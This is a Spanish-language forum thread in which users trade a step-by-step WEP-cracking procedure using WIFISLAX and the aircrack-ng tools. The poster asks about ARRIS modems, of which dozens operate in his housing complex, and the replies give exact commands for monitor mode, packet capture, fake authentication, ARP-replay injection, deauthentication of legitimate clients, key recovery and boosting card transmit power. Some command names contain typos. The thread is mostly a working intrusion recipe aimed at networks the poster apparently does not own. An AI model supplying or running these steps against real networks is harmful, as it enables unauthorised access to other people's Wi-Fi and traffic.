Hola compañeros foreros, pues hoy tengo una pregunta que nos se a bien si venga aqui en esta seccion, pero bueno ahi va mi tema:

Navegnado por la red me encontre con el live-cd WIFISLAX 3.1 el cual primordialmente sirve para monitorear y por tanto conseguir claves wep de los access point aledaños, yo ya lo probe y en verdad funciona, al menos con los Acces Point marca 2 WIRE que aqui en mexico proporciona la telefonica principal. (lo probe autohackeando mi modem 2wire), pero al probar con los modems ARRIS que proporciona la cablera mas famosa de mexico, no he podido conseguir la clave wep de estos modems y no se por que no lo logro si en "teoria" debiera ser igual. ¿alguien sabe que me sucede ?

En resumidas cuentas les cuento como se obtiene la web de un 2wire

Se requiere obviamente el live-cd de wifsflax 3.1 y una ves que se logra hacer el BOOT con este cd

se abren 2 terminales en la primera:

1 Se usa el comando lwconfig para obtenr la mac address de nuestra tarjeta inalambrica

2 el siguiente comando es iwconfig para confirmar que esta activa nuestra tarjeta inalambrica

3 con el comando airmon-ng start wlan0 se configura la tarjeta inalambrica en modo MONITOR

4 con el comando airodump-ng -w miarchivo -c6 wlan0 , se obtiene el listado de servidores de redes inalambricas (access points) y en este listado se pueden apreciar los SSID , MAC Addrees de los mismos, el canal en que transpiten etc.

En la segunda consola se corre el siguiente comando:

aireplaya-ng -1 30 -e SSID -a Macaddress_acces_point -h Macaddress_nuestra_Tarjeta wlan0

con lo que se logra autenticar el access point con nuestra tarjeta de red y asi comenzar el ataque

despues de entre 15 o 20 minutos

en la tercera consola se utiliza el comando aircrack-ptw miarchivo-01.cap

en esta ultima parte despliega el numero wep que estamos buscando.


Nota.- todo esto que escribo lo encontraran en un mil videos y tutoriales que hay por ahi, sin embargo en los arris no lo he logrado, ojala alguno de ustedes me pudiera ayudar a despejar esta duda que tengo

Saludos

Hola este post lo tendrias que poner en la zona wifi pero te contesto aqui,que ya lo moveran
Seguramente que los rooters de la telefonica de mexico tengan claves de 32 o 64 bits y los de cm de 128,pero si que es raro,por que no veo en tu explicacion mas detalles y no se si usas dicionario wlan para las de telefonica,tendrias que darme mas detalles,tambien te aconsejo que te bajes el wifiway 1 y utilices el airoscript que es un script con todas las opciones que necesitas sin tener que usar comandos
Aqui en españa la timofonica de españa usa rooters wlan que saltan con 4 ivs usando wlandecripter,en cambio los cm no usan ese protocolo por lo que necesitas de 15000 a 50000 ivs dependiendo de la clave si es de 64 o 128,en este caso tendrias que hacer una autentificacion falsa y mediante la inyecion conseguir tal cantidad de ivs necesarias

Otra cosa aireplaya-ng no esiste sera aireplay-ng -1 30 -e SSID -a Macaddress_acces_point -h Macaddress_nuestra_Tarjeta wlan0



Saludos

Agradezco tus comentarios que finalmente me llevaron a comprender mejor la situacion que enfrentaba con los modems ARRIS, y a leer mas detenidamente la informacion que me proporcionaban los propios comandos (airodump-ng -w miarchivo -c6 wlan0) y la conclusion a la que llegue es la siguiente:

EL modem arris aunque logres la autentificacion falsa, no acepta la inyeccion de manera adecuada o al menos igual que los 2wire, pero descubri (quizas todo mundo ya lo sabia , menos yo) que si alguien esta autentificado al modem arris via inalambrica, entonces la inyeccion se logra de manera favorable, obteniendo la clave en 200000 ivs.

Les comento que vivo en una unidad habitacional con decenas de modems arris funcionando en la zona, y de ahi que me nacio el interes de probar todo este asunto y todos los modems en el que su dueño se conecta via inalambrica convierte en vulnerable su clave wep. ¿Curiosa conclusion y dato al que llegue no?.

Te agradezco Papones la atencion, me sorprende seguir aprendiendo cosas que quizas para muchos es facil, para mi no tanto, asi que es muy satisfactorio entender como funcionan las cosas y lo vulnerable que puede ser la informatica aun en pleno siglo 21. El estudio de todo esto a cumplido muy bien la funcion ludica que seguramente muchos buscamos detras de la pantalla. Por ultimo tienes razon el comando es aireplay-ng y no aireplaya-ng. errores de dedo, mil perdones.

Saludos y mil gracias otra ves

Pero que todo el mundo hemos pasado por esa fase y solo hemos aprendido los que hemos puesto interés en ello y como veo que estas muy verde y te va gustar,te recomiendo que te pases por la sección Routers & Redes & Wifi (Solo usuarios registrados pueden ver los links) ,que le heches un vistazo a los post con chincheta y una vez leídos apunta las dudas y con mucho gusto te diré por donde tienes que ir para seguir aprendiendo,por que si una persona tiene interés no le voy hacer perder horas y horas de investigación en cambio si la veo que no se preocupa ni en leer va a dar mas vueltas que una noria

Y apúntate esto y que te quede claro,en informática seguro no hay nada ya que siempre van a crear 10 tipos un programa "EL MAS SEGURO DEL MUNDO"pero si analizas bien las cosas,siempre van a tener a 20000 millones buscando los exploits correctos para reventarlo
La seguridad es lo que tiene hay cientos de asociaciones no lucrativas de expertos en network security trabajando gratis y por hooby buscando las cosquillas a los programas "MAS SEGUROS DEL MUNDO"lol

Un hacker es un experto en seguridad informática que analiza las vulnerabilidades informáticas,simplemente por hoobyy sin ningun animo de lucro,compartiendo sus conocimientos y recibiendo el mismo de otros miembros de su comunidad

Todo lo de mas que no este en esa definición no es un hacker es un criminal,estafador y de mas que se aprovecha de la ignorancia de otros para robar y delinquir


Creo que esto responde a tus dudas,siempre hay una sociedad 5000 veces mayor que todas las empresas de seguridad del mundo,que encima de no aceptar ni un duro de nadie les analizan y resuelven los fallos a los que dice que han creado "EL MEJOR Y MAS SEGURO PROGRAMA DEL MUNDO? y encima gratis y por hooby


Su único delito es el ansia de conocimiento.Saludos

veo un par de fallos en tus comandos pero el principal es lanzar el aircrack atacando solo 1 CAP los modem arris crean varios caps en ese casi deberias lanzar el ataque de la siguiente forma en vez de aircrack-ptw miarchivo-01.cap pondrias aircrack-ptw miarchivo-0*.cap ya que el asteriso lanza el ataque sobre los caps que se creen si son varios y no solo lanza el ataque sobre uno solo, ademas lanzo dos aireplay uno para autentificarte y otro para la inyeccion de paquetes .- aireplay-ng -3 -b macv -h mmac wlan0 (data wait along for over 100 undred paq) – (inyeccion de datos), espero te sirva esto

macv es por mac victima y mmac es por mi mac, toma en cuenta que en linux basta escribir mal un comando o ponerlos en mayus o minus mal y sale mal el proceso

te mando mi manual de pasos igual te sirve

1.- root / pass toor

2.- xconf
3.- startx
4.- abrir shell

5.- iwconfig
6.- airmon-ng start wlan0
7.- airodump-ng wlan0 (ctrl-z para detener)
8.- airodump-ng -w infinitumxxxx --bssid macv -c canal wlan0

9.- abrir shell
10.- aireplay-ng -1 0 -e INFINTUMxxxx -a macv -h mmac wlan0 (buscar opn)NO AVANZAR UNTIL END
11.- aireplay-ng -3 -b macv -h mmac wlan0 (data wait along for over 100 undred paq) – (inyeccion de datos)


12.- open shell
13.- airecrack-ng -z infinitumxxxx.cap (en caso de varios cap, usar infinitumxx*.cap)


**** comandos van en minus,,,,,,, mac en mayus....
LAS MACV Y MMAC VAN MAYUS

aireplaya-ng -1 30 -e SSID -a Macaddress_acces_point -h Macaddress_nuestra_Tarjeta wlan0
Si no os asociara tambien podeis probar con este comando:

aireplay-ng -1 6000 -o 1 -q 10 -e "ESSID" -a "BSSID" -h 00:11:22:33:44:55 wlan0

Y para los que usais el RTL8187L que no se os olvide usar el highpower para dejar las tarjetas a 1W (o a lo que funcione las buestra :ok)

iwpriv wlan0 highpower 1
iwconfig wlan0 txpower 29
iwconfig wlan0 rate 1M

tened cuidado con darle mucho txpower que las vais a chumascar....yo no le daría más de 20 a la alfa de 1W (por poner un ejemplo).

tened cuidado con darle mucho txpower que las vais a chumascar....yo no le daría más de 20 a la alfa de 1W (por poner un ejemplo).

No, a la alfa no le debes dar mas de 30, dejarla en 20 es dejarla en 0,1W :ok

Por internet hay mucha info al respecto; para darte un par de pistas de por dónde van los tiros, aquí se trata de capturar paquetes arp. Si no hay ningún cliente legítimo asociado al punto de acceso, difícilmente vas a capturar ningún arp.
Suponiendo que ya tenemos un cliente legítimo conectado, tenemos 2 opciones:
1. Capturamos los arp que está generando el cliente legítimo, con lo cual no hace falta que nos asociemos, pero si no está generando mucho tráfico tardaremos mucho en capturar los arp necesarios para obtener la clave, y si el cliente se desconecta dejaremos de capturar.
2. Sólo necesitamos capturar un arp, el cual lo reinyectaremos a una velocidad no superior a 50 arp/segundo, necesitando por tanto hacer una autenticación falsa; si el cliente legítimo no genera el primer arp necesario, aplicamos un ataque de desautentificación para generarlo. De esta manera capturamos los arp que nosotros reinyectamos más lo arp que el cliente legítimo genera, con lo cual es muy rápido. Hay que estar al tanto de que nuestra reinyección no sea rechazada; normalmente volviéndonos a autenticar se soluciona.